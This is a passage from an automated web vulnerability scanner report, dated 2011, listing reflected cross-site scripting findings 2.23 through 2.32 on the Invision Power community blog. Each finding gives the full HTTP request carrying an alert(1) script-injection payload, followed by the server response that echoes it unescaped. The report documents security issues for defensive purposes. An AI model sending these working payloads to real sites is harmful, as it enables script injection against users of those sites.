User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=bb0286ec98b780009858344a28ff45a6; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:43 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwtDC2rgVcMFxcaQal; expires=Thu, 02-Feb-2012 23:09:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1&amp;_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'>
...[SNIP]...

2.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=6d6d1d1b3d63548ae301ccd0f4821244; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:10:06 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:09 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwMjCzrgVcMFxcVwah; expires=Thu, 02-Feb-2012 23:10:09 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1";
       ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.24. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=830c72b6f5c7a37fd2959ce58bae984c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:41 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:45 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwNjOyrgVcMFxcaAak; expires=Thu, 02-Feb-2012 23:12:45 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 115430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016?_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'>
...[SNIP]...

2.25. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f3251d120798010dc874974665fe8aeb; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:11 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwtjSyrgVcMFxcdAan; expires=Thu, 02-Feb-2012 23:13:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
ipt type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e";
       ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:11:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f70f43da4b3560f15ad879d5e298e90f; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:01 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:05 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNjKyrgVcMFxcuAam; expires=Thu, 02-Feb-2012 23:12:05 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements &#38; Anti-Fraud Protection";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:11:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=9baa9e4d8417a95c12b288e362ecba30; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:11:30 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:11:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwsjS0rgVcMFxczAar; expires=Thu, 02-Feb-2012 23:11:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1&amp;_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'>
...[SNIP]...

2.28. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=22e858a8ab959b81f8a3bb18c5e84ab7; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:22 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNjG2rgVcMFxcwwap; expires=Thu, 02-Feb-2012 23:12:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da?_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'>
...[SNIP]...

2.29. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c07155729daa7d6d40b594c2ff1a8698; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:49 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:51 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNrOwrgVcMFxc2gaw; expires=Thu, 02-Feb-2012 23:12:51 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements &#38; Anti-Fraud Protection";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=2ce9d11814a97267fd707d92e4e4934e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:10:19 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwMjKwrgVcMFxcJgab; expires=Thu, 02-Feb-2012 23:10:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=4b3644eca5f51a158215dd0c69ada06b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:54 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:57 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwtDSxrgVcMFxcSQal; expires=Thu, 02-Feb-2012 23:09:57 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1&amp;_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...

2.32. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
